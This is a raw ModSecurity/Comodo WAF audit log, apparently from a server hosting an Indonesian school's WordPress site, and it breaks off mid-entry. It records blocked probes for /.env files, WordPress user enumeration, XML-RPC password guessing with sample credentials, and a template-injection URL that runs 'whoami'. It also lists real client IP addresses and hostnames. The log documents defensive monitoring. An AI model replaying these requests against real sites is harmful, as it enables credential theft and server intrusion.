Apache-HttpClient/4.5.13 (Java/11.0.26) --b9594b70-C-- demo.sayHello --b9594b70-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --b9594b70-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745501106663694 5866 (- - -) Stopwatch2: 1745501106663694 5866; combined=4282, p1=582, p2=3454, p3=30, p4=35, p5=105, sr=131, sw=76, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9594b70-Z-- --1b2e733b-A-- [24/Apr/2025:20:27:07 +0700] aAo8K2Luk3f9kLjsdTYEUQAAAI0 103.236.140.4 42174 103.236.140.4 8181 --1b2e733b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.86.64 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.86.64 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/600.8.9 (KHTML, like Gecko) Version/8.0.8 Safari/600.8.9 Accept-Charset: utf-8 --1b2e733b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b2e733b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745501227779839 776 (- - -) Stopwatch2: 1745501227779839 776; combined=341, p1=304, p2=0, p3=0, p4=0, p5=37, sr=116, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b2e733b-Z-- --9ab68a53-A-- [24/Apr/2025:20:29:28 +0700] aAo8uGLuk3f9kLjsdTYEcgAAAIw 103.236.140.4 42728 103.236.140.4 8181 --9ab68a53-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9ab68a53-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9ab68a53-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745501368909594 2866 (- - -) Stopwatch2: 1745501368909594 2866; combined=1284, p1=421, p2=832, p3=0, p4=0, p5=31, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9ab68a53-Z-- --deffdb2b-A-- [24/Apr/2025:20:29:36 +0700] aAo8wMlQo524fhbIj1z1EgAAAAI 103.236.140.4 42760 103.236.140.4 8181 --deffdb2b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.47.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.47.194 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --deffdb2b-C-- demo.sayHello --deffdb2b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --deffdb2b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745501376228475 5764 (- - -) Stopwatch2: 1745501376228475 5764; combined=4414, p1=582, p2=3601, p3=35, p4=36, p5=97, sr=73, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --deffdb2b-Z-- --cd64a25d-A-- [24/Apr/2025:20:51:26 +0700] aApB3viVYlyO1xhz7yMw9AAAAMU 103.236.140.4 45458 103.236.140.4 8181 --cd64a25d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.71 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.71 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cd64a25d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cd64a25d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745502686681070 3081 (- - -) Stopwatch2: 1745502686681070 3081; combined=1414, p1=446, p2=925, p3=0, p4=0, p5=42, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cd64a25d-Z-- --266bc07b-A-- [24/Apr/2025:20:51:32 +0700] aApB5MlQo524fhbIj1z96AAAAAw 103.236.140.4 45858 103.236.140.4 8181 --266bc07b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.163.71 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.163.71 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --266bc07b-C-- demo.sayHello --266bc07b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --266bc07b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745502692865262 8099 (- - -) Stopwatch2: 1745502692865262 8099; combined=6351, p1=722, p2=5309, p3=59, p4=78, p5=110, sr=68, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --266bc07b-Z-- --857be613-A-- [24/Apr/2025:21:45:31 +0700] aApOi_iVYlyO1xhz7yNjrAAAANg 103.236.140.4 45712 103.236.140.4 8181 --857be613-B-- GET /?n=%0A&cmd=whoami&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.} HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.93.252.194 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.93.252.194 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Upgrade-Insecure-Requests: 1 --857be613-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --857be613-E-- --857be613-H-- Message: Access denied with code 403 (phase 2). Invalid URL Encoding: Non-hexadecimal digits used at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "82"] [id "210381"] [rev "6"] [msg "COMODO WAF: URL Encoding Abuse Attack Attempt||103.236.140.4|F|4"] [data "REQUEST_URI=/?n=%0A&cmd=whoami&search=%25xxx%25url%25:%password%}{.exec|{.?cmd.}|timeout=15|out=abc.}{.?n.}{.?n.}RESULT:{.?n.}{.^abc.}===={.?n.}"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745505931039884 2938 (- - -) Stopwatch2: 1745505931039884 2938; combined=1774, p1=418, p2=1310, p3=0, p4=0, p5=46, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --857be613-Z-- --a393ce16-A-- [24/Apr/2025:22:06:25 +0700] aApTcfiVYlyO1xhz7yNvMAAAAMU 103.236.140.4 39620 103.236.140.4 8181 --a393ce16-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.10 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a393ce16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a393ce16-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745507185620879 2464 (- - -) Stopwatch2: 1745507185620879 2464; combined=1105, p1=396, p2=684, p3=0, p4=0, p5=24, sr=60, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a393ce16-Z-- --5027364c-A-- [24/Apr/2025:22:06:31 +0700] aApTd_iVYlyO1xhz7yNvNwAAAMw 103.236.140.4 39772 103.236.140.4 8181 --5027364c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.10 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.10 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5027364c-C-- demo.sayHello --5027364c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5027364c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745507191689586 6991 (- - -) Stopwatch2: 1745507191689586 6991; combined=4909, p1=628, p2=3996, p3=38, p4=44, p5=117, sr=77, sw=86, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5027364c-Z-- --b97ea92c-A-- [24/Apr/2025:22:26:03 +0700] aApYC2Luk3f9kLjsdTZNawAAAIY 103.236.140.4 40720 103.236.140.4 8181 --b97ea92c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.119 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --b97ea92c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b97ea92c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745508363758466 2694 (- - -) Stopwatch2: 1745508363758466 2694; combined=1229, p1=410, p2=789, p3=0, p4=0, p5=29, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b97ea92c-Z-- --587a8f00-A-- [24/Apr/2025:22:26:11 +0700] aApYE8lQo524fhbIj1xHfwAAAA4 103.236.140.4 40912 103.236.140.4 8181 --587a8f00-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.178.119 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.178.119 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --587a8f00-C-- demo.sayHello --587a8f00-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --587a8f00-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745508371216146 7907 (- - -) Stopwatch2: 1745508371216146 7907; combined=6005, p1=755, p2=4990, p3=46, p4=61, p5=91, sr=77, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --587a8f00-Z-- --11247228-A-- [24/Apr/2025:22:32:10 +0700] aApZeslQo524fhbIj1xJ_wAAAAA 103.236.140.4 49634 103.236.140.4 8181 --11247228-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 178.128.207.219 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 178.128.207.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --11247228-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --11247228-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745508730833096 650 (- - -) Stopwatch2: 1745508730833096 650; combined=293, p1=263, p2=0, p3=0, p4=0, p5=30, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --11247228-Z-- --97f4ed32-A-- [24/Apr/2025:22:40:00 +0700] aApbUGLuk3f9kLjsdTZUBQAAAIY 103.236.140.4 60846 103.236.140.4 8181 --97f4ed32-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 139.59.136.184 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 139.59.136.184 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --97f4ed32-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97f4ed32-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745509200913842 813 (- - -) Stopwatch2: 1745509200913842 813; combined=315, p1=275, p2=0, p3=0, p4=0, p5=40, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97f4ed32-Z-- --69f14c7b-A-- [24/Apr/2025:22:48:45 +0700] aApdXfiVYlyO1xhz7yN-AAAAAM0 103.236.140.4 45136 103.236.140.4 8181 --69f14c7b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.184 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --69f14c7b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --69f14c7b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1745509725000142 2900 (- - -) Stopwatch2: 1745509725000142 2900; combined=1379, p1=440, p2=907, p3=0, p4=0, p5=32, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --69f14c7b-Z-- --dc4fc311-A-- [24/Apr/2025:22:48:52 +0700] aApdZGLuk3f9kLjsdTZWKAAAAIs 103.236.140.4 45316 103.236.140.4 8181 --dc4fc311-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.38.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.38.184 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dc4fc311-C-- demo.sayHello --dc4fc311-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dc4fc311-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745509732375282 5439 (- - -) Stopwatch2: 1745509732375282 5439; combined=4264, p1=512, p2=3509, p3=41, p4=36, p5=97, sr=72, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dc4fc311-Z-- --17033e26-A-- [24/Apr/2025:23:00:22 +0700] aApgFt5yz20UX9VrdZObsgAAAFE 103.236.140.4 35776 103.236.140.4 8181 --17033e26-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.80.2 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.80.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.2b) Gecko/20021001 Phoenix/0.2 Accept-Charset: utf-8 --17033e26-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --17033e26-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1745510422928390 782 (- - -) Stopwatch2: 1745510422928390 782; combined=291, p1=249, p2=0, p3=0, p4=0, p5=42, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --17033e26-Z-- --d5a90020-A-- [24/Apr/2025:23:20:52 +0700] aApk5GLuk3f9kLjsdTZjiAAAAIE 103.236.140.4 56406 103.236.140.4 8181 --d5a90020-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d5a90020-C-- wp.getUsersBlogs admin 123456789 --d5a90020-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d5a90020-E-- --d5a90020-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1745511652961605 4949 (- - -) Stopwatch2: 1745511652961605 4949; combined=3405, p1=404, p2=2818, p3=0, p4=0, p5=104, sr=74, sw=79, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d5a90020-Z-- --0e3bb613-A-- [24/Apr/2025:23:21:57 +0700] aAplJfiVYlyO1xhz7yORbQAAANU 103.236.140.4 60564 103.236.140.4 8181 --0e3bb613-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 14.18.120.74 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 14.18.120.74 X-Forwarded-Proto: http Connection: close Content-Length: 220 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --0e3bb613-C-- wp.getUsersBlogs admin admin1981 --0e3bb613-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e3bb613-E-- --0e3bb613-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file 